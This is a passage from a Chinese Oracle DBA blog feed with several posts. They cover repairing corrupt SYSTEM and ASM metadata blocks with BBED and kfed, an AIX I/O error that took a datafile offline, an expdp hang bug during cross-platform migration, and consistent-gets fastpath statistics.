0x16:pti[2]     nrow=1  offs=15
0x1a:pti[3]     nrow=10 offs=16
0x1e:pti[4]     nrow=15 offs=26
0x22:pti[5]     nrow=100        offs=41
.....
col  0: [ 2]  c1 14
tab 1, row 0, @0x1e65
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 0
tab 1, row 1, @0x1ddb
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 1
tab 1, row 2, @0x1d51
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 2
tab 1, row 3, @0x1ccd
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 4
tab 1, row 4, @0x1c45
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 5
tab 1, row 5, @0x1bc0
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 6
tab 1, row 6, @0x1b35
tl: 4 fb: -CHDFL-- lb: 0x2  cc: 0 cki: 7
tab 2, row 0, @0x160
tl: 48 fb: -CH-FL-- lb: 0x0  cc: 19 cki: 3
col  0: [ 2]  c1 1e
col  1: [ 1]  80
.....
col 17: *NULL*
col 18: [ 1]  80
tab 3, row 0, @0x1ad0
.....

看到这里,我就想是否可以通过bbed先把这2个block 给修复了,看看是否能够起来。如下是简单的修复过程:
对于51号block 由于是Index 修改非常简单,这里不多说。26号block 是cluster table,这个相对复杂的多。首先提交事务、修改lock flag之后verify还是报错,如下:

BBED> verify
DBVERIFY - Verification starting
FILE = /u01/fix/SYSTEM_OLD.dbf
BLOCK = 26

Block Checking: DBA = 4194330, Block Type = KTB-managed data block
data header at 0x105d485c
kdbchk:  key comref count wrong
         keyslot=7
Block 26 failed with check code 6121

DBVERIFY - Verification complete

Total Blocks Examined         : 1
Total Blocks Processed (Data) : 1
Total Blocks Failing   (Data) : 1
Total Blocks Processed (Index): 0
Total Blocks Failing   (Index): 0
Total Blocks Empty            : 0
Total Blocks Marked Corrupt   : 0
Total Blocks Influx           : 0

这里继续修改聚簇对应的kdbr信息(这里以其中一个kdbr为例):

BBED> p *kdbr[7]
rowdata[7568]
-------------
ub1 rowdata[7568]                           @8012     0xac

BBED> x /rcccccc
rowdata[7568]                               @8012
-------------
flag@8012: 0xac (KDRHFL, KDRHFF, KDRHFH, KDRHFK)
lock@8013: 0x00
cols@8014:    1
kref@8015:   31
mref@8017:   30
hrid@8019:0x0040001b.0
nrid@8025:0x0040001b.0

BBED> modify /x 1f offset 8017
 File: /u01/fix/SYSTEM_OLD.dbf (1)
 Block: 26               Offsets: 8017 to 8020           Dba:0x0040001a
------------------------------------------------------------------------
 1f000040 

 <32 bytes per line

BBED> verify
DBVERIFY - Verification starting
FILE = /u01/fix/SYSTEM_OLD.dbf
BLOCK = 26

Block Checking: DBA = 4194330, Block Type = KTB-managed data block
data header at 0x105d485c
kdbchk: space available on commit is incorrect
        tosp=987 fsc=0 stb=0 avsp=32
Block 26 failed with check code 6111

DBVERIFY - Verification complete

Total Blocks Examined         : 1
Total Blocks Processed (Data) : 1
Total Blocks Failing   (Data) : 1
Total Blocks Processed (Index): 0
Total Blocks Failing   (Index): 0
Total Blocks Empty            : 0
Total Blocks Marked Corrupt   : 0
Total Blocks Influx           : 0

BBED> p kdbh
struct kdbh, 14 bytes                       @92
   ub1 kdbhflag                             @92       0x00 (NONE)
   b1 kdbhntab                              @93       6
   b2 kdbhnrow                              @94       141
   sb2 kdbhfrre                             @96      -1
   sb2 kdbhfsbo                             @98       320
   sb2 kdbhfseo                             @100      352
   b2 kdbhavsp                              @102      32
   b2 kdbhtosp                              @104      987

BBED> d /v offset 104 count 2
 File: /u01/fix/SYSTEM_OLD.dbf (1)
 Block: 26      Offsets:  104 to  105  Dba:0x0040001a
-------------------------------------------------------
 db03                                l ..

 <16 bytes per line>

BBED> modify /x 2000 offset 104
 File: /u01/fix/SYSTEM_OLD.dbf (1)
 Block: 26               Offsets:  104 to  105           Dba:0x0040001a
------------------------------------------------------------------------
 2000 

 <32 bytes per line>

BBED> sum apply
Check value for File 1, Block 26:
current = 0x87ce, required = 0x87ce
BBED> verify
DBVERIFY - Verification starting
FILE = /u01/fix/SYSTEM_OLD.dbf
BLOCK = 26

DBVERIFY - Verification complete

Total Blocks Examined         : 1
Total Blocks Processed (Data) : 1
Total Blocks Failing   (Data) : 0
Total Blocks Processed (Index): 0
Total Blocks Failing   (Index): 0
Total Blocks Empty            : 0
Total Blocks Marked Corrupt   : 0
Total Blocks Influx           : 0

我们经过几处简单修改之后,再次verify校验已经不再报错了;不过再次open数据库时,发现报另外一个错误了:

Errors in file /u01/app/oracle/admin/orcl/udump/orcl1_ora_18955.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [kdoirp-3], [139], [0], [], [], [], [], []

从错误来看,bootstrap的初始化过程仍然有问题。通过10046 trace跟踪发现还是那几个block。
回想前面这个block的dump时,看到的几行操作是delete,如下:tl: 4 fb: -CHDFL– lb: 0×2  cc: 0 cki: 0
那么我们这里试做将这几个被删除的操作进行还原是否ok 呢? 也就是用bbed来恢复这7个delete操作。
由于是cluster table 的block,操作相对麻烦一些。不过我尝试修改之后,最后发现错误仍然一样。
其中[kdoirp-3]是什么含义呢? 我们来看下Oracle 文档的描述:

Layer 11:  KCOCODRW -  Row
opcode 1 :  KDOIUR  - interpret undo redo
opcode 2 :  KDOIRP  - insert row  piece
opcode 3 :  KDODRP  - drop row piece
opcode 4 :  KDOLKR  - lock row  piece
opcode 5 :  KDOURP  - update row piece
opcode 6 :  KDOORP  - overwrite row piece
opcode 7 :  KDOMFC  - manipulate first column
opcode 8 :  KDOCFA  - change forwarding address
opcode 9 :  KDOCKI  - change cluster key index
opcode 10 :  KDOSKL  - set key links
opcode 11 :  KDOQMI  - quick multi-insert (ex. insert as select...)
opcode 12 :  KDOQMD  - quick multi-delete
opcode 13 :  KDOTBF  - toggle block header flags

很明显,这表示insert row piece。 看来我们单纯的修改这2个block 并不能绕过这个问题。 实际上后面我dump分析发现又涉及到_next_object,又将问题复杂化了。
虽然我相信多折腾几次可以解决这个问题。但是操作确实麻烦,费劲。不过此时通过之前的备份restore出来的system文件已经ok了。这里我用bbed 将涉及到的几个block 进行替换,最后再修改resetlogs信息,重建控制文件之后,进行recover。
非常顺利的打开了数据库。最后检查alert log 还涉及到smon 回滚某个事务失败。那么如何完美处理呢?
首先dump undo header,然后获取该事务涉及的操作对象,然后使用如下参数屏蔽回滚段后,将undo表空间重建即可。
如下是dump undo header获取的信息:
针对这部分对象,由于破坏了事务的完整性,那么建议对表进行分析,其中Index进行重建。

Related posts:

  1. 一次远程协助的恢复 遇到异灵事件
  2. 一次TB级ERP(ASM RAC)库的恢复
  3. ora-00600 kccpb_sanity_check_2和kclchkblk_4的恢复case
  4. sysaux大面积坏块的例子
  5. Deep in ora-00600 [4193]

datafile auto offlile due to i/o error

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: datafile auto offlile due to i/o error

刚到酒店,就接到客户电话说某数据库的一个数据文件报IO错误,通过vpn查看发现如下:

Sun Oct 30 23:19:27 BEIST 2016
Trace dumping is performing id=[cdmp_20161030231927]
Sun Oct 30 23:19:27 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/bdump/xxxx2_smon_11863216.trc:
ORA-00376: file 595 cannot be read at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
Sun Oct 30 23:19:31 BEIST 2016
ORACLE Instance xxxx2 (pid = 22) - Error 376 encountered while recovering transaction (160, 1).
Sun Oct 30 23:19:31 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/bdump/xxxx2_smon_11863216.trc:
ORA-00376: file 595 cannot be read at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
Sun Oct 30 23:19:32 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/bdump/xxxx2_smon_11863216.trc:
ORA-00376: file 595 cannot be read at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
Sun Oct 30 23:19:33 BEIST 2016

我们不难看出,报错文件无法读;实际上我登录2个节点ls -tr检查发现权限都是正确的,同时通过dbv 检查该文件发现也无坏块;因此我断定直接recover该文件即可。在recover时,发现居然报错nfs挂载有问题:

SQL> recover datafile 595;
ORA-00279: change 15125505612642 generated at 10/30/2016 18:06:07 needed for thread 1
ORA-00289: suggestion : /arch2/1_108445_815539661.dbf
ORA-00280: change 15125505612642 for thread 1 is in sequence #108445

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
/arch1/1_108445_815539661.dbf
ORA-00308: cannot open archived log '/arch1/1_108445_815539661.dbf'
ORA-27054: NFS file system where the file is created or resides is not mounted with correct options
Additional information: 6

由此可见该环境问题还不少。既然本地节点无法读取,为了短时间内恢复正常,直接将部分归档cp到相应的归档目录中,再次进行recover即可成功online该文件,如下:

Sun Oct 30 23:20:23 BEIST 2016
alter database datafile 595 online
Sun Oct 30 23:20:23 BEIST 2016
Completed: alter database datafile 595 online
Sun Oct 30 23:20:28 BEIST 2016
SMON: Parallel transaction recovery tried
Sun Oct 30 23:23:02 BEIST 2016
Thread 2 advanced to log sequence 164113 (LGWR switch)
  Current log# 7 seq# 164113 mem# 0: /dev/rora_redo2_01

我们可以看到,确实顺利online文件了,还好是归档的数据库。那么我们继续来分析一下,为什么会出现这个问题呢? 进一步搜索alert log发现该在下午18:15分开始出现I欧错误:

Sun Oct 30 18:15:04 BEIST 2016
KCF: write/open error block=0x29790 online=1
     file=595 /dev/rdata05vg_8g_48
     error=27063 txt: 'IBM AIX RISC System/6000 Error: 5: I/O error
Additional information: -1
Additional information: 131072'
Automatic datafile offline due to write error on
file 595: /dev/rdata05vg_8g_48
Sun Oct 30 18:15:28 BEIST 2016
Thread 2 advanced to log sequence 164100 (LGWR switch)
  Current log# 12 seq# 164100 mem# 0: /dev/rora_redo2_06
Sun Oct 30 18:15:28 BEIST 2016
Errors in file /oracle/app/10.2/admin/xxxx/udump/xxxx2_ora_28705020.trc:
ORA-00372: file 595 cannot be modified at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'
ORA-00372: file 595 cannot be modified at this time
ORA-01110: data file 595: '/dev/rdata05vg_8g_48'

我们可以看到,因为出现错误,Oracle自动将数据文件offline了,这其实是数据库的一直保护机制(没有相关隐含参数来控制)。到这里我怀疑多半是操作系统哪儿出问题了,果然errpt 查看发现在18:15出现了path error错误。

oracle:xxx$(/oracle)errpt
IDENTIFIER TIMESTAMP  T C RESOURCE_NAME  DESCRIPTION
3D32B80D   1030181516 P S topsvcs        NIM thread blocked
3D32B80D   1030181516 P S topsvcs        NIM thread blocked
E86653C3   1030181516 P H LVDD           I/O ERROR DETECTED BY LVM
B6267342   1030181516 P H hdisk46        DISK OPERATION ERROR
DE3B8540   1030181516 P H hdisk46        PATH HAS FAILED
DE3B8540   1030181416 P H hdisk46        PATH HAS FAILED

oracle:xxxx$(/oracle/app/10.2/admin/xxxx/bdump)errpt -aj DE3B8540
---------------------------------------------------------------------------
LABEL:          SC_DISK_ERR7
IDENTIFIER:     DE3B8540

Date/Time:       Sun Oct 30 18:15:00 BEIST 2016
Sequence Number: 921
Machine Id:      00F7A4904C00
Node Id:         sti50l02
Class:           H
Type:            PERM
WPAR:            Global
Resource Name:   hdisk46
Resource Class:  disk
Resource Type:   Hitachi
......
......

Description
PATH HAS FAILED

Probable Causes
ADAPTER HARDWARE OR CABLE
DASD DEVICE

Failure Causes
UNDETERMINED

        Recommended Actions
        PERFORM PROBLEM DETERMINATION PROCEDURES
        CHECK PATH

Detail Data
PATH ID

不难看出,由于下午出现了相关错误,导致数据库出现了IO异常,oracle自动将文件offline了。然而我在刚刚lspath检查发现都ok,实际上也应该这样,否则recover datafile还会继续报IO错误。夜深了,到这里结束吧!简单记录一下!

 

PS:

1) NFS挂载的相关参数说明

Operating System Mount options for Binaries ## Mount options for Oracle Datafiles Mount options for CRS Voting Disk and OCR
Sun Solaris * rw,bg,hard,nointr,rsize=32768,
wsize=32768,proto=tcp,noac,

vers=3,suid

rw,bg,hard,nointr,rsize=32768,
wsize=32768,proto=tcp,noac,
forcedirectio, vers=3
rw,bg,hard,nointr,rsize=32768,
wsize=32768,proto=tcp,vers=3,
noac,forcedirectio
AIX (5L) ** rw,bg,hard,nointr,rsize=32768,
wsize=32768,proto=tcp,

vers=3,timeo=600

cio,rw,bg,hard,nointr,rsize=32768,
wsize=32768,proto=tcp,noac,
vers=3,timeo=600
cio,rw,bg,hard,intr,rsize=32768,
wsize=32768,tcp,noac,
vers=3,timeo=600
HPUX 11.23 ***  – rw,bg,vers=3,proto=tcp,noac,
hard,nointr,timeo=600,
rsize=32768,wsize=32768,suid
rw,bg,vers=3,proto=tcp,noac,
forcedirectio,hard,nointr,timeo=600,
rsize=32768,wsize=32768
rw,bg,vers=3,proto=tcp,noac,
forcedirectio,hard,nointr,timeo=600
,rsize=32768,wsize=32768
Windows Not Supported Not Supported Not Supported
Linux x86
#
****
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp, vers=3,
timeo=600, actimeo=0
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,actimeo=0,
vers=3,timeo=600
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,noac,actimeo=0,
vers=3,timeo=600
Linux x86-64 #
****
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,vers=3,
timeo=600, actimeo=0
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,actimeo=0,
vers=3,timeo=600
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,noac,vers=3,
timeo=600,actimeo=0
Linux – Itanium rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,vers=3,
timeo=600, actimeo=0
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,actimeo=0,
vers=3,timeo=600
rw,bg,hard,nointr,rsize=32768,
wsize=32768,tcp,noac,vers=3,
timeo=600,actimeo=0

* NFS mount option “forcedirectio” is required on Solaris platforms when mounting the OCR/CRS files when using Oracle 10.1.0.4 or 10.2.0.2 or later (Oracle unpublished bug 4466428)
** AIX is only supported with NAS on AIX 5.3 TL04 and higher with Oracle 10.2.0.1 and later
*** NAS devices are only supported with HPUX 11.23 or higher ONLY
# These mount options are for Linux kernels 2.6 and above. For older kernels please check Note 279393.1

## The stated mount options for binaries are applicable only if the ORACLE HOME is shared.

Due to Unpublished bug 5856342, it is necessary to use the following init.ora parameter when using NAS with all versions of RAC on Linux (x86 & X86-64 platforms) until 10.2.0.4. This bug is fixed and included in 10.2.0.4 patchset.
filesystemio_options = DIRECTIO

 

2) 如果是Oracle 11.2.0.2版本开始,在没有安装Patch 7691270的情况之下,Oracle在遇到IO错误之后,会自动将数据库crash掉,其中有个相关的隐含参数:_datafile_write_errors_crash_instance

该参数在11.2.0.2版本之后默认为true,包含最新的11.2.0.4版本。

Enter value for par: datafile_write
old   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%&par%'
new   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%datafile_write%'

NAME                                               VALUE                DESCRIB
-------------------------------------------------- -------------------- ------------------------------------------------------------
_datafile_write_errors_crash_instance              TRUE                 datafile write errors crash instance

Related posts:

  1. win 环境 O/S-Error: (OS 23) 数据错误(循环冗余检查) —恢复
  2. Archivelog 模式下,datafile header损坏,如何恢复?
  3. datafile 也能跨resetlogs ?
  4. 11.2.0.4 RAC CRS diskgroup auto dismount问题

Recover Case: 一个24TB的rac(asm)恢复案例

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: Recover Case: 一个24TB的rac(asm)恢复案例

前几天某客户的一个核心数据库,大约24TB的rac,asm diskgroup无法mount。经过分析发现是某个disk的一个block坏掉了。其中通过kfed read读取发现确实有问题:

$ kfed read /dev/rdisk/disk392 aun=0 blkn=2 | more
kfbh.endian:                         76 ; 0x000: 0x4c
kfbh.hard:                           86 ; 0x001: 0x56
kfbh.type:                           77 ; 0x002: *** Unknown Enum ***
kfbh.datfmt:                         82 ; 0x003: 0x52
kfbh.block.blk:              1162031153 ; 0x004: blk=1162031153
kfbh.block.obj:               620095014 ; 0x008: file=386598
kfbh.check:                  1426510413 ; 0x00c: 0x5506d24d
kfbh.fcn.base:                        0 ; 0x010: 0x00000000
kfbh.fcn.wrap:                        0 ; 0x014: 0x00000000
kfbh.spare1:                  524288639 ; 0x018: 0x1f40027f
kfbh.spare2:                          0 ; 0x01c: 0x00000000
60000000000F3200 4C564D52 45433031 24F5E626 5506D24D  [LVMREC01$..&U..M]
60000000000F3210 00000000 00000000 1F40027F 00000000  [.........@......]

我们通过手工构造了一个block,然后进行merge修复之后,我尝试mount diskgroup,发现还是报错,如下:

Fri Oct 28 04:47:56 2016
WARNING: cache read  a corrupt block: group=3(DATA) dsk=49 blk=18 disk=49 (DATA_0049) incarn=3636812057 au=0 blk=18 count=1
Errors in file /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_arb0_21799.trc:
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
NOTE: a corrupted block from group DATA was dumped to /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_arb0_21799.trc
WARNING: cache read (retry) a corrupt block: group=3(DATA) dsk=49 blk=18 disk=49 (DATA_0049) incarn=3636812057 au=0 blk=18 count=1
Errors in file /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_arb0_21799.trc:
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
ERROR: cache failed to read group=3(DATA) dsk=49 blk=18 from disk(s): 49(DATA_0049)
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
ORA-15196: invalid ASM block header [kfc.c:26076] [endian_kfbh] [2147483697] [18] [76 != 0]
NOTE: cache initiating offline of disk 49 group DATA
NOTE: process _arb0_+asm1 (21799) initiating offline of disk 49.3636812057 (DATA_0049) with mask 0x7e in group 3
WARNING: Disk 49 (DATA_0049) in group 3 in mode 0x7f is now being taken offline on ASM inst 1
NOTE: initiating PST update: grp = 3, dsk = 49/0xd8c55919, mask = 0x6a, op = clear
Fri Oct 28 04:47:56 2016
GMON updating disk modes for group 3 at 23 for pid 25, osid 21799
ERROR: Disk 49 cannot be offlined, since diskgroup has external redundancy.
ERROR: too many offline disks in PST (grp 3)
WARNING: Offline of disk 49 (DATA_0049) in group 3 and mode 0x7f failed on ASM inst 1
Fri Oct 28 04:47:56 2016
NOTE: halting all I/Os to diskgroup 3 (DATA)
Fri Oct 28 04:47:56 2016
NOTE: cache dismounting (not clean) group 3/0x51B5A89F (DATA)
NOTE: messaging CKPT to quiesce pins Unix process pid: 23376, image: oracle@cqracdb1 (B000)
Fri Oct 28 04:47:56 2016
ERROR: ORA-15130 in COD recovery for diskgroup 3/0x51b5a89f (DATA)
ERROR: ORA-15130 thrown in RBAL for group number 3
Errors in file /oracle/ora11g/crs_base/diag/asm/+asm/+ASM1/trace/+ASM1_rbal_6465.trc:
ORA-15130: diskgroup "DATA" is being dismounted

不难看出,这个错误比较熟悉了。从上述日志来看,第49号disk的第0号AU的第18号block还是有问题,通过kfed读取发现确实也是坏块。跟前面第2号block 一样。这里如法炮制,仍然构造一样的block,然后merge之后,成功将diskgroup mount了。

SQL> alter system set asm_power_limit=0 scope=both;

System altered.

SQL> alter diskgroup data mount;

Diskgroup altered.

将diskgroup mount之后,我检查数据库,发现crs自动将数据库拉起来了,并且已经open了。然而后续进一步检查发现asm的arb进程仍然在报错:

ARB0 relocating file +DATA.278.794162479 (120 entries)
DDE: Problem Key 'ORA 600 [kfdAuDealloc2]' was flood controlled (0x2) (incident: 1486148)
ORA-00600: internal error code, arguments: [kfdAuDealloc2],85], [278], [14309 [], [], [], [], [], [], [], [], []
OSM metadata struct dump of kfdatb:
kfdatb.aunum:                      7168 ; 0x000: 0x00001c00
kfdatb.shrink:                      448 ; 0x004: 0x01c0
kfdatb.ub2pad:                     7176 ; 0x006: 0x1c08
kfdatb.auinfo[0].link.next:           8 ; 0x008: 0x0008
kfdatb.auinfo[0].link.prev:           8 ; 0x00a: 0x0008
kfdatb.auinfo[1].link.next:          12 ; 0x00c: 0x000c
kfdatb.auinfo[1].link.prev:          12 ; 0x00e: 0x000c
kfdatb.auinfo[2].link.next:          16 ; 0x010: 0x0010
kfdatb.auinfo[2].link.prev:          16 ; 0x012: 0x0010
kfdatb.auinfo[3].link.next:          20 ; 0x014: 0x0014
kfdatb.auinfo[3].link.prev:          20 ; 0x016: 0x0014
kfdatb.auinfo[4].link.next:          24 ; 0x018: 0x0018
kfdatb.auinfo[4].link.prev:          24 ; 0x01a: 0x0018
kfdatb.auinfo[5].link.next:          28 ; 0x01c: 0x001c
kfdatb.auinfo[5].link.prev:          28 ; 0x01e: 0x001c
kfdatb.auinfo[6].link.next:          32 ; 0x020: 0x0020
kfdatb.auinfo[6].link.prev:          32 ; 0x022: 0x0020
kfdatb.spare:                         0 ; 0x024: 0x00000000
Dump of ate#:0
OSM metadata struct dump of kfdate:
kfdate.discriminator:                 1 ; 0x000: 0x00000001
kfdate.allo.lo:                       0 ; 0x000: XNUM=0x0
kfdate.allo.hi:                 8388608 ; 0x004: V=1 I=0 H=0 FNUM=0x0

虽然已经不影响数据库的正常运行,然而由于arb进程的异常,导致reblance操作实际上没有进行完成,客户新加的磁盘基本上没有被使用,导致diskgroup的磁盘使用不均衡。

这个错误看上去很复杂,实际上很简单。根据后面的序号,我们可以判断,本质来讲是因为我们前面手工构造的2个block其实并不完整,这是allocate table,需要将后面的kfdate数据都构造完毕,才能让arb进程正常工作下午。

不过熊爷已经在修改odu代码了,准备odu来搞定这个遗留问题。看来ODU以后将具备修复ASM元数据的功能了。很强悍!

Related posts:

  1. Where is the backup of ASM disk header block? –补充
  2. Oracle 11g asm中不同au size下datafile的au分布初探
  3. oracle asm 剖析系列(2)–pst/fst/allocator tabe
  4. oracle asm 剖析系列(4) –file directory
  5. One recover case!

xtts expdp hung at inital stages

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: xtts expdp hung at inital stages

上周6某电信客户进行OSS数据库从aix到Linux的跨平台迁移升级,数据库版本并没有太大变化,即从11.2.0.3 到11.2.0.4。友商在进行3次测试,据说都没有太大问题。

然而,在正式割接时,进行元数据导出时,发现expdp操作hung住,几十分钟都没有任何反应,最后通过dblink的方式直接在目标库进行impdp操作来绕过了该问题。

经查确认是该Oracle Bug 16318046 : TTS EXPORT STUCK AT INITIAL STAGES,关于该bug的描述如下:

Bug 16318046 : TTS EXPORT STUCK AT INITIAL STAGES	

Bug 属性

类型	B - Defect	已在产品版本中修复
严重性	2 - Severe Loss of Service	产品版本	11.2.0.3
状态	36 - Duplicate Bug. To Filer	平台	226 - Linux x86-64
创建时间	2013-2-13	平台版本	NO DATA
更新时间	2016-8-5	基本 Bug	13717234
数据库版本	11.2.0.3	影响平台	Generic
产品源	Oracle	与此 Bug 相关的知识, 补丁程序和 Bug

相关产品

产品线	Oracle Database Products	系列	Oracle Database Suite
区域	Oracle Database	产品	5 - Oracle Database - Enterprise Edition

Hdr: 16318046 11.2.0.3 RDBMS 11.2.0.3 DATA PUMP EXP PRODID-5 PORTID-226 13717234
Abstract: TTS EXPORT STUCK AT INITIAL STAGES

*** 02/12/13 10:36 am ***

PROBLEM:
--------

expdp "'/ as sysdba'" parfile=auexpxtts.dat
;;;
Export: Release 11.2.0.3.0 - Production on Wed Jan 23 23:00:14 2013

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.
;;;
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 -
64bit Production
With the Partitioning and Oracle Label Security options
Starting "SYS"."SYS_EXPORT_TRANSPORTABLE_01":  "/******** AS SYSDBA"
parfile=auexpxtts.dat

DIAGNOSTIC ANALYSIS:
--------------------
SQL ID: bjf05cwcj5s6p
Plan Hash: 0
BEGIN :1 := sys.kupc$que_int.receive(:2); END;

call     count       cpu    elapsed       disk      query    current
rows
------- ------  -------- ---------- ---------- ---------- ----------
----------
Parse    16229      1.79       2.17          0          0          0
 0
Execute  16228     45.18   81114.46          0      65309          0
26
Fetch        0      0.00       0.00          0          0          0
 0
------- ------  -------- ---------- ---------- ---------- ----------
----------
total    32457     46.98   81116.63          0      65309          0
26

Misses in library cache during parse: 1
Misses in library cache during execute: 1
Optimizer mode: ALL_ROWS
Parsing user id: SYS   (recursive depth: 2)

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  wait for unread message on broadcast channel
                                              81109        1.38      81058.42
  library cache: mutex X                          2        0.00          0.00
  library cache lock                              1        4.69          4.69
******************************************************************************
**

Trace file: P2PDB21_dm03_34603216.trc

SQL ID: bjf05cwcj5s6p
Plan Hash: 0
BEGIN :1 := sys.kupc$que_int.receive(:2); END;

call     count       cpu    elapsed       disk      query    current
rows
------- ------  -------- ---------- ---------- ---------- ----------
----------
Parse      140      0.01       0.01          0          0          0
 0
Execute    140      0.33     496.10          0       1656          0
70
Fetch        0      0.00       0.00          0          0          0
 0
------- ------  -------- ---------- ---------- ---------- ----------
----------
total      280      0.34     496.11          0       1656          0
70

Misses in library cache during parse: 0
Optimizer mode: ALL_ROWS
Parsing user id: SYS   (recursive depth: 2)

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  wait for unread message on broadcast channel
                                                519        1.12        495.72
******************************************************************************
**

Trace file: P2PDB21_dw00_37552328.trc

SQL ID: 82n5hj2hgrbdx
Plan Hash: 2296790768
SELECT  objnum
FROM
  (SELECT r, objnum FROM   (SELECT rownum r, o.obj# objnum    FROM  sys.obj$
  o, sys.tab$ t, sys.dba_xml_tab_cols x,  sys.user$ u    WHERE  t.ts# = :1
  AND t.obj# = o.obj# AND  o.name = x.table_name AND o.owner# = u.user# AND
  u.name = x.owner AND  (x.storage_type = 'BINARY') AND  NOT EXISTS (SELECT 1 

  FROM   sys.ku_noexp_tab noexp WHERE  noexp.obj_type =  'USER' AND
  noexp.name = u.name)) ) WHERE r = 1 

call     count       cpu    elapsed       disk      query    current
rows
------- ------  -------- ---------- ---------- ---------- ----------
----------
Parse        1      0.00       0.00          0          0          0
 0
Execute    436      0.12       0.14          0        680          0
 0
Fetch      435  75154.06   79676.07          1   56238520          0
 0
------- ------  -------- ---------- ---------- ---------- ----------
----------
total      872  75154.19   79676.21          1   56239200          0
 0

WORKAROUND:
-----------
use normal export but ct using EBS and required to use datapump.

RELATED BUGS:
-------------
Bug:13728919 

REPRODUCIBILITY:
----------------

TEST CASE:
----------

STACK TRACE:
------------

SUPPORTING INFORMATION:
-----------------------

24 HOUR CONTACT INFORMATION FOR P1 BUGS:
----------------------------------------

DIAL-IN INFORMATION:
--------------------

在此记录一下,希望大家以后在进行xtts跨平台迁移时注意这个问题,不要再次掉到坑里。

Related posts:

  1. soft parse 和 library cache lock
  2. library cache: mutex X引发的故障
  3. The cause of system hung is cursor: pin X ?
  4. XTTS(Cross Platform Incremental Backup)的测试例子
  5. expdp 报错ORA-7445 的一个问题展开

About consistent gets from cache (fastpath)

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: About consistent gets from cache (fastpath)

Oracle 11g相比10g版本而言,在优化器方面有很多改进,这里不一一列举。在分析某运营商客户的CRM系统时,发现每秒的逻辑读高达100w左右,其中Consistent Gets 就占据了90w之多。由此可见,这可能存在一个巨大的优化空间。然而,当我查询statistics信息时,发现了一个奇怪的事情,如下所示:

SQL> l
  1  select b.name, a.value
  2    from v$sysstat a, v$statname b
  3   where a.STATISTIC# = b.STATISTIC#
  4*    and b.NAME like 'consistent gets%'
SQL> /

NAME                                                                            VALUE
-------------------------------------------------- ----------------------------------
consistent gets                                                         2919902517406
consistent gets from cache                                              2918741933811
consistent gets from cache (fastpath)                                               0
consistent gets - examination                                            947312709390
consistent gets direct                                                     1160585050

SQL> /

NAME                                                                            VALUE
-------------------------------------------------- ----------------------------------
consistent gets                                                         2919907774371
consistent gets from cache                                              2918747190826
consistent gets from cache (fastpath)                                               0
consistent gets - examination                                            947314388772
consistent gets direct                                                     1160585845

我们可以看出,其中consistent gets from cache(fastpath)为0. 这让我一下就感觉到有点奇怪。首先针对这个统计信息,之前确实没有过多关注过,其次这里value为0,从直觉上来讲就感觉有点问题。

实际上,consistent gets from cache(pastpath)这是Oracle 11g引入的一个新特性,针对buffer pin的一个优化操作,其目的是可以降低Latch的争用,尤其是Cache buffer chains的争用。

首先我们来看下Oracle 10gR2的情况:

www.killdb.com@create table t(
  2  n number,
  3  v varchar2(100),
  4  constraint pk_n primary key (n)); 

Table created.

www.killdb.com@insert into t
  2  select level, rpad('*', 100, '*')
  3   from dual
  4   connect by level <= 1000; 

1000 rows created.

www.killdb.com@create or replace procedure get_cg(
  2    p_cg out number,
  3    p_cg_c out number,
  4    p_cgfp out number,
  5    p_cg_ex out number,
  6    p_cg_dir out number
  7   ) is
  8   begin
  9    select max(case sn.NAME when 'consistent gets' then ms.value end),
 10    max(case sn.NAME when 'consistent gets from cache' then ms.value end),
 11      max(case sn.NAME when 'consistent gets from cache (fastpath)' then ms.value end),
 12      max(case sn.NAME when 'consistent gets - examination' then ms.value end),
 13      max(case sn.NAME when 'consistent gets direct' then ms.value end)
